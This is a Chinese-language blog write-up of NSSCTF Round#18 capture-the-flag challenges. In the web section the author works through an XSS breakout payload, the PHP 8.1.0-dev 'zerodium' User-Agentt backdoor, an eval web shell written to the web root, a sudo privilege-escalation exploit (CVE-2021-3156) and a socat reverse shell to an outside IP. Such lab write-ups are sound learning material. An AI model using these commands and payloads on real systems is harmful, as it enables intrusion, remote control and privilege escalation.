<!DOCTYPE html>
<html>
    <head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport" />
  <meta name="robots" content="index, follow">
  <!-- title -->
  
    
  <title>SICTF#3-NSSCTF#18记录复现 - Hello Hehanzzz~</title>
    
  
  
  <!-- open graph -->
  <meta name="description" content="NSSCTF Round#18WEB[NSSRound#18 Basic]门酱想玩什么呢？比赛的时候刚从外地回家，没来得及看题，于是上题库后重新复现  题目位置：[NSSRound#18 Basic]门酱想玩什么呢？ | NSSCTF  刚打开网站的时候出现一个mp4，一开始并没有想着说去F12看看，等mp4播放完后就自动挑战到了 king.php 下 后续没思路的时候重头来过，看了一下数据包没啥">
<meta property="og:type" content="article">
<meta property="og:title" content="SICTF#3-NSSCTF#18记录复现">
<meta property="og:url" content="https://hehanzzz.github.io/2024/02/17/SICTF-3-NSSCTF-18%E8%AE%B0%E5%BD%95%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="Hello Hehanzzz~">
<meta property="og:description" content="NSSCTF Round#18WEB[NSSRound#18 Basic]门酱想玩什么呢？比赛的时候刚从外地回家，没来得及看题，于是上题库后重新复现  题目位置：[NSSRound#18 Basic]门酱想玩什么呢？ | NSSCTF  刚打开网站的时候出现一个mp4，一开始并没有想着说去F12看看，等mp4播放完后就自动挑战到了 king.php 下 后续没思路的时候重头来过，看了一下数据包没啥">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061252398.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061252748.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061252520.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061252772.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061252239.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253511.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253073.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253116.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253569.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253541.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253657.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253155.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253918.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253014.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253644.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253642.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253981.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253708.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253762.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253193.png">
<meta property="og:image" content="http://oss.hehanzzz.icu/img/202405061253933.png">
<meta property="article:published_time" content="2024-02-17T08:35:16.000Z">
<meta property="article:modified_time" content="2025-01-06T08:36:09.585Z">
<meta property="article:author" content="Hehanzzz">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://oss.hehanzzz.icu/img/202405061252398.png">
  <!-- canonical -->
  
  <link rel="canonical" href="https://hehanzzz.github.io/2024/02/17/SICTF-3-NSSCTF-18记录复现/">
  
  <!-- Favicon -->
  <link rel="shortcut icon" href="/img/3.png">
  <link rel="apple-touch-icon" sizes="180x180" href="/img/apple-touch-icon.png">
  <!-- CSS -->
  
<link rel="stylesheet" href="/css/reset.css">

  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/css/markdown.css">

  
<link rel="stylesheet" href="/css/fonts.css">

<meta name="generator" content="Hexo 7.0.0"></head>

    <body>
        <div class="paper">
            <div class="paper-main">
                
                    <div class="post-header">
    <a class="logo" href="/">Hello Hehanzzz~</a>
    <!-- <div class="logo"><a href="/" title="Len"><img src="/img/logo.svg" alt="Len" aria-label="logo" height="20"></a></div> -->
        <ul class="nav">
            
            <li><a href="/">Home</a></li>
            
            <li><a href="/about">About</a></li>
            
            <li><a href="/archives">Archives</a></li>
            
            <li><a href="/friends">Friends</a></li>
            
        </ul>


    </a>
</div>


                
                <div class="post-main">
    
        <div class="post-main-title">
            SICTF#3-NSSCTF#18记录复现
        </div>
        <div class="post-meta">
            2024-02-17 ｜ 
            
        </div>
        <!-- 圆角分类 -->
        <!-- <div class="tags"> -->
            <!--  -->
        <!-- </div> -->
        <div class="post-md">
            <h1 id="NSSCTF-Round-18"><a href="#NSSCTF-Round-18" class="headerlink" title="NSSCTF Round#18"></a>NSSCTF Round#18</h1><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="NSSRound-18-Basic-门酱想玩什么呢？"><a href="#NSSRound-18-Basic-门酱想玩什么呢？" class="headerlink" title="[NSSRound#18 Basic]门酱想玩什么呢？"></a>[NSSRound#18 Basic]门酱想玩什么呢？</h3><p>比赛的时候刚从外地回家，没来得及看题，于是上题库后重新复现</p>
<blockquote>
<p>题目位置：[<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/5123">NSSRound#18 Basic]门酱想玩什么呢？ | NSSCTF</a></p>
</blockquote>
<p>刚打开网站的时候出现一个mp4，一开始并没有想着说去F12看看，等mp4播放完后就自动挑战到了 king.php 下</p>
<p>后续没思路的时候重头来过，看了一下数据包没啥东西，就用F12大法看看有没有隐藏信息</p>
<p>不过需要注意的是，这题有hint，也指向了启动页面（还是hint很关键啊，前面浪费了很久时间）</p>
<blockquote>
<p>门酱想玩新游戏了，你能给他下载地址吗？<br>hint1: 启动的页面藏了提示<br>hint2: 与cookie无关，给门酱链接就行了</p>
</blockquote>
<p><img src="http://oss.hehanzzz.icu/img/202405061252398.png"></p>
<p>提示了这个地址：nssctfroundSpring.php</p>
<pre><code class="highlight php"><span class="meta">&lt;?php</span>
<span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);
<span class="comment">//部分关键代码</span>
<span class="variable">$contentLines</span> = <span class="title function_ invoke__">explode</span>(<span class="string">&quot; &quot;</span>, <span class="variable">$comment</span>[<span class="string">&#x27;content&#x27;</span>]);
<span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^https?:\/\/\S+$/&#x27;</span>, <span class="variable">$contentLines</span>[<span class="number">0</span>])) &#123;
    <span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^https?:\/\/[^\/]+\/\S+\.png$/&#x27;</span>, <span class="variable">$contentLines</span>[<span class="number">0</span>], <span class="variable">$matches</span>) &amp;&amp; <span class="title function_ invoke__">end</span>(<span class="variable">$contentLines</span>) === <span class="string">&#x27;/png&#x27;</span>) &#123;
        <span class="variable">$urlParts</span> = <span class="title function_ invoke__">parse_url</span>(<span class="variable">$matches</span>[<span class="number">0</span>]);
        <span class="keyword">if</span> (<span class="variable">$urlParts</span> !== <span class="literal">false</span>) &#123;
            <span class="keyword">echo</span> <span class="string">&#x27;&lt;img class=&quot;content&quot; src=&quot;&#x27;</span> . <span class="variable">$matches</span>[<span class="number">0</span>] . <span class="string">&#x27;&quot;&gt;&#x27;</span>;
            <span class="comment">//.......</span>
        &#125;
        <span class="comment">//......</span>
    &#125;
    <span class="comment">//......</span>
&#125;</code></pre>

<p>先继续浏览一下其他页面吧首页下</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061252748.png"></p>
<p>有一个文本框还有一个评论区</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061252520.png"></p>
<p>评论区可以进行评论，结合前面的hint其实大概也能猜出来是XSS了，不过具体xss要干什么还不知道</p>
<p>因为hint给了与cookie无关，所以猜测可能不是打cookie</p>
<p>然后要给门酱一个链接，猜测应该是用XSS进行跳转吧</p>
<p>这里随便给了门酱个链接，例如<a target="_blank" rel="noopener" href="http://www.baidu.com显示要自己的网站/">www.baidu.com显示要自己的网站</a></p>
<p>刚好符合前面的猜测，进行xss跳转</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061252772.png"></p>
<p>拿靶机的网站上去试试</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061252239.png"></p>
<p>不再显示</p>
<p>于是看nssctfroundSpring.php进行xss</p>
<p>直接进行分析：</p>
<ol>
<li><code>$contentLines = explode(&quot; &quot;, $comment[&#39;content&#39;]);</code> 这行代码将评论内容 <code>$comment[&#39;content&#39;]</code> 按照空格进行分割，存储到 <code>$contentLines</code> 数组中。假设评论内容是以空格分隔的单词。</li>
<li><code>if (preg_match(&#39;/^https?:\/\/\S+$/&#39;, $contentLines[0])) &#123;</code> 这行代码用正则表达式检查评论内容中第一个单词是否是以 <code>http://</code> 或 <code>https://</code> 开头的链接。如果是，则继续执行下面的逻辑。</li>
<li><code>if (preg_match(&#39;/^https?:\/\/[^\/]+\/\S+\.png$/&#39;, $contentLines[0], $matches) &amp;&amp; end($contentLines) === &#39;/png&#39;) &#123;</code> 这行代码使用正则表达式检查链接是否以 <code>.png</code> 结尾，并且链接的结尾也是 <code>/png</code>。如果是，则执行下面的逻辑。</li>
<li><code>$urlParts = parse_url($matches[0]);</code> 这行代码使用 <code>parse_url</code> 函数解析匹配到的链接，将其分解为各个部分，并存储到 <code>$urlParts</code> 变量中。</li>
<li><code>if ($urlParts !== false) &#123;</code> 这行代码检查 <code>parse_url</code> 函数是否成功解析了链接，如果成功，则继续执行下面的逻辑。</li>
<li><code>echo &#39;&lt;img class=&quot;content&quot; src=&quot;&#39; . $matches[0] . &#39;&quot;&gt;&#39;;</code> 这行代码输出一个 <code>&lt;img&gt;</code> 标签，将匹配到的图片链接作为 <code>src</code> 属性的值，并添加了一个 <code>class=&quot;content&quot;</code> 的类名。这样就会在页面上显示该图片。</li>
</ol>
<p>前面就是正常的评论区要求的输入规则，后面的echo是xss的关键，在代码审计中echo更是xss的关键，有机会写一下关于xss的代码审计</p>
<p>可以看到是将前面的内容直接拼接进来，所以我们按照评论规则接着使用 “&gt; 直接闭合是不是就可以达到xss</p>
<p>理论成立，实践开始</p>
<pre><code class="highlight HTML">http://1.com&quot;&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span>&lt;img&quot;1.png 12 /png</code></pre>

<p><img src="http://oss.hehanzzz.icu/img/202405061253511.png"></p>
<p>然后就直接百度一个跳转语法就好啦</p>
<pre><code class="highlight javascript">&lt;script&gt;<span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">&#x27;https://genshin.hoyoverse.com/&#x27;</span>;&lt;/script&gt;</code></pre>

<p>payload：</p>
<pre><code class="highlight javascript"><span class="attr">http</span>:<span class="comment">//1.com&quot;&gt;&lt;script&gt;window.location.href=&#x27;https://genshin.hoyoverse.com/&#x27;;&lt;/script&gt;&lt;img&quot;1.png 12 /png</span></code></pre>

<p>因为xss跳转无法立即拿到url，所以bp拦截一下就好了</p>
<pre><code class="highlight HTML">/words/?title=MQ%3D%3D&amp;content=aHR0cCUzQSUyRiUyRjEuY29tJTIyJTNFJTNDc2NyaXB0JTNFd2luZG93LmxvY2F0aW9uLmhyZWYlM0QnaHR0cHMlM0ElMkYlMkZnZW5zaGluLmhveW92ZXJzZS5jb20lMkYnJTNCJTNDJTJGc2NyaXB0JTNFJTNDaW1nJTIyMS5wbmclMjAxMiUyMCUyRnBuZw%3D%3D</code></pre>

<p>结果还是不行，人傻了，等重新看了一下评论区才发现，这nm我给错游戏了，应该给元梦之星</p>
<p>重新来</p>
<pre><code class="highlight javascript">&lt;script&gt;<span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">&#x27;https://ymzx.qq.com/&#x27;</span>;&lt;/script&gt;</code></pre>

<p>payload：</p>
<pre><code class="highlight javascript"><span class="attr">http</span>:<span class="comment">//1.com&quot;&gt;&lt;script&gt;window.location.href=&#x27;https://ymzx.qq.com/&#x27;;&lt;/script&gt;&lt;img&quot;1.png 12 /png</span></code></pre>

<pre><code class="highlight plaintext">/words/?title=MQ%3D%3D&amp;content=aHR0cCUzQSUyRiUyRjEuY29tJTIyJTNFJTNDc2NyaXB0JTNFd2luZG93LmxvY2F0aW9uLmhyZWYlM0QnaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiclM0IlM0MlMkZzY3JpcHQlM0UlM0NpbWclMjIxLnBuZyUyMDEyJTIwJTJGcG5n</code></pre>

<p>成功拿到flag：NSSCTF{64844971-41d6-4111-ab66-495df8fb4c15}</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253073.png"></p>
<p>好久没打ctf了，没想到越来越脑洞了……</p>
<h3 id="NSSRound-18-Basic-easy-rw"><a href="#NSSRound-18-Basic-easy-rw" class="headerlink" title="[NSSRound#18 Basic]easy_rw"></a>[NSSRound#18 Basic]easy_rw</h3><p>金币不够做不了  -。-</p>
<p>占个坑，等我下次金币够了在做吧</p>
<blockquote>
<p>题目位置：[<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/5135">NSSRound#18 Basic]easy_rw | NSSCTF</a></p>
</blockquote>
<p><img src="http://oss.hehanzzz.icu/img/202405061253116.png"></p>
<h3 id="NSSRound-18-Basic-Becomeroot"><a href="#NSSRound-18-Basic-Becomeroot" class="headerlink" title="[NSSRound#18 Basic]Becomeroot"></a>[NSSRound#18 Basic]Becomeroot</h3><blockquote>
<p>题目位置：[<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/5126">NSSRound#18 Basic]Becomeroot | NSSCTF</a></p>
</blockquote>
<blockquote>
<p>题目描述：php的开发仓库好像被入侵过</p>
</blockquote>
<p>一打开就是一个phpinfo</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253569.png"></p>
<p>一脸懵逼，有点抽象，不会又跟前面那个xss一样得寻找蛛丝马迹吧</p>
<p>往信息泄露这方面去想了想，发现PHP版本是已知的 PHP Version 8.1.0-dev</p>
<p> <img src="http://oss.hehanzzz.icu/img/202405061253541.png"></p>
<p>找到这个PHP版本有后门漏洞，通过发送 User-Agentt 标头来执行任意代码</p>
<p>那还说什么，直接开测</p>
<p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1839234">PHP 8.1.0-dev 后门远程命令执行漏洞复现-腾讯云开发者社区-腾讯云 (tencent.com)</a></p>
<p>payload测试：</p>
<pre><code class="highlight html">User-Agentt: zerodiumvar_dump(2*3);</code></pre>

<p>成功回显int(6)，漏洞存在。</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253657.png"></p>
<p>ls看看根目录</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253155.png"></p>
<p>根据最开始说的flag在&#x2F;root下，用ls看看</p>
<p>发现回显空，猜测是不是没权限呀</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253918.png"></p>
<p>执行whoami发现是user用户</p>
<p>判断没权限，难不成ctf得提权了？？？</p>
<p>不管先，先上shell</p>
<p>写🐎得先看目录在哪，盲猜默认目录 &#x2F;var&#x2F;www&#x2F;html</p>
<p>ls看了一下发现确实是，回显了index.php</p>
<p>那就直接用echo写🐎了</p>
<pre><code class="highlight plaintext">User-Agentt: zerodiumsystem(&#x27;echo &quot;&lt;?php @eval($_POST[1]);phpinfo();?&gt;&quot;&gt;/var/www/html/1.php&#x27;);</code></pre>

<p>打开1.php，提示</p>
<p><strong>Parse error</strong>:  syntax error, unexpected end of file, expecting “(“ in <strong>&#x2F;var&#x2F;www&#x2F;html&#x2F;1.php(1) : eval()’d code</strong> on line <strong>1</strong></p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253014.png"></p>
<p>看来得对$进行转义</p>
<pre><code class="highlight html">User-Agentt: zerodiumsystem(&#x27;echo &quot;<span class="meta">&lt;?php @eval(\$_POST[1]);phpinfo();?&gt;</span>&quot;&gt;/var/www/html/1.php&#x27;);</code></pre>

<p>成功写入，连接</p>
<p>md还真要提权，env没有，也打不开root目录，小小ctf还整上提权了</p>
<p>看一下内核版本：</p>
<pre><code class="highlight plaintext">cat /etc/*-release</code></pre>

<p><img src="http://oss.hehanzzz.icu/img/202405061253644.png"></p>
<p>发现是 Ubuntu 20.04.3 LTS</p>
<p>直接百度Ubuntu 20.04.3 LTS提权，使用<a target="_blank" rel="noopener" href="https://github.com/briskets/CVE-2021-3493/tree/main">CVE-2021-3493</a>提权</p>
<p>一顿操作猛如虎，结果失败了</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253642.png"></p>
<p>没办法，换方法</p>
<p>往浏览器下翻了一下，发现还有个 CVE-2021-31560 可以试试</p>
<p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1782930">【漏洞修复】Linux Sudo本地提权漏洞修复（CVE-2021-31560)-腾讯云开发者社区-腾讯云 (tencent.com)</a></p>
<p>但是找不到exp，百度这个cve结果发现这篇文章后面多打了一个0  &#x3D;.&#x3D;</p>
<p>正确的cve应该是：CVE-2021-3156：<a target="_blank" rel="noopener" href="https://github.com/blasty/CVE-2021-3156.git">https://github.com/blasty/CVE-2021-3156</a></p>
<p>发现还是不太行</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253981.png"></p>
<p>被迫去看官方wp</p>
<p>发现真的是这个cve，但是上面的poc打不成功</p>
<p>用官方的poc去打：<a target="_blank" rel="noopener" href="https://github.com/CptGibbon/CVE-2021-3156">CptGibbon&#x2F;CVE-2021-3156: Root shell PoC for CVE-2021-3156 (github.com)</a></p>
<p>发现也不太ok</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253708.png"></p>
<p>猜测应该是得用交互式shell才能提权了，传个socat弹个交互式shell到服务器上</p>
<p>但是这时候，服务器崩坏了（寄，又得花费30金币）</p>
<p>重新开了一个靶机 用socat进行交互shell</p>
<pre><code class="highlight plaintext">./socat exec:&#x27;bash -li&#x27;,pty,stderr,setsid,sigint,sane tcp:39.108.11.237:2333</code></pre>

<p><img src="http://oss.hehanzzz.icu/img/202405061253762.png"></p>
<p>直接make 然后运行</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253193.png"></p>
<p>也是终于成功了www…</p>
<p><img src="http://oss.hehanzzz.icu/img/202405061253933.png"></p>
<p>NSSCTF{0014fed1-627b-4d93-802c-1ccefda6df75}</p>
<p>总结一下，这题跟上面的xss一样麻烦（可能是我太菜了吧），但是难度并不难，几个细节还是得注意一下的</p>
<p>然后就是socat这个命令可以记录一下，看官方wp是直接去使用这个cve也没判断过程（老藏着掖着不写详细）</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="NSSRound-18-Basic-温馨的酒吧"><a href="#NSSRound-18-Basic-温馨的酒吧" class="headerlink" title="[NSSRound#18 Basic]温馨的酒吧"></a>[NSSRound#18 Basic]温馨的酒吧</h3><blockquote>
<p>题目链接：<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1nH4y1E7Hg/">https://www.bilibili.com/video/BV1nH4y1E7Hg/</a></p>
</blockquote>
<p>这题没什么好说的，不评价，全部走完流程就可以拿flag了</p>
<h3 id="NSSRound-18-Basic-Number-7"><a href="#NSSRound-18-Basic-Number-7" class="headerlink" title="[NSSRound#18 Basic]Number 7"></a>[NSSRound#18 Basic]Number 7</h3><blockquote>
<p>Inside No.9 or Inside No.7 ?<br>182A1918071C152E0A4737263A3E780A6F6A075A112742777C687D0700773F7D39560063487D</p>
</blockquote>
<p>Type 7加密，找个在线网站解密就好了</p>
<p><a target="_blank" rel="noopener" href="http://www.atoolbox.net/Tool.php?Id=992">Type7密码加密&#x2F;解密 - 一个工具箱 - 好用的在线工具都在这里！ (atoolbox.net)</a></p>
<p>NSSCTF{H4PPY_N3WY34r_4ND_N55CTF_18TH}</p>
<h3 id="NSSRound-18-Basic-usersssssssss"><a href="#NSSRound-18-Basic-usersssssssss" class="headerlink" title="[NSSRound#18 Basic]usersssssssss"></a>[NSSRound#18 Basic]usersssssssss</h3><blockquote>
<p>这么多用户，总有一个用户拥有flag<br>（用户名取自附件中的字典，密码就是用户名的md5sum）</p>
</blockquote>
<blockquote>
<p>题目链接：[<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/5128">NSSRound#18 Basic]usersssssssss | NSSCTF</a></p>
</blockquote>
<p>应该是爆破题，有空再看看，不想浪费金币</p>
<h3 id="NSSRound-18-Basic-Debuger"><a href="#NSSRound-18-Basic-Debuger" class="headerlink" title="[NSSRound#18 Basic]Debuger"></a>[NSSRound#18 Basic]Debuger</h3><blockquote>
<p>什么，直接开放一个debuger让我来操作吗，这么好的吗</p>
</blockquote>
<blockquote>
<p>题目链接：[<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/5127">NSSRound#18 Basic]Debuger | NSSCTF</a></p>
</blockquote>
<p>占坑，晚点看看，还没做过类似的题目</p>
<h1 id="SICTF-Round-3"><a href="#SICTF-Round-3" class="headerlink" title="SICTF Round#3"></a>SICTF Round#3</h1><p>等晚点结束了再把wp放出来</p>

        </div>
    
<!-- tags -->

    <div class="post-meta">
        标签：
        
            <a href="/tags/CTF/"> / CTF</a>
        
    </div>

</div>
                <div class="footer">
    <span>Copyright © <script>document.write(new Date().getFullYear())</script> Hello Hehanzzz~</span>
    <span>Powered by <a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a> with <a target="_blank" rel="noopener" href="https:///imzl.com/zenmind">ZenMind</a></span>
</div>

<link rel="stylesheet" href="/css/theme.min.css">


<script src="/js/highlight.min.js"></script>


<script src="/js/highlightjs-line-numbers.js"></script>

<script>
    hljs.initHighlightingOnLoad();
    hljs.initLineNumbersOnLoad();
</script>

            </div>
        </div>
    </body>
</html>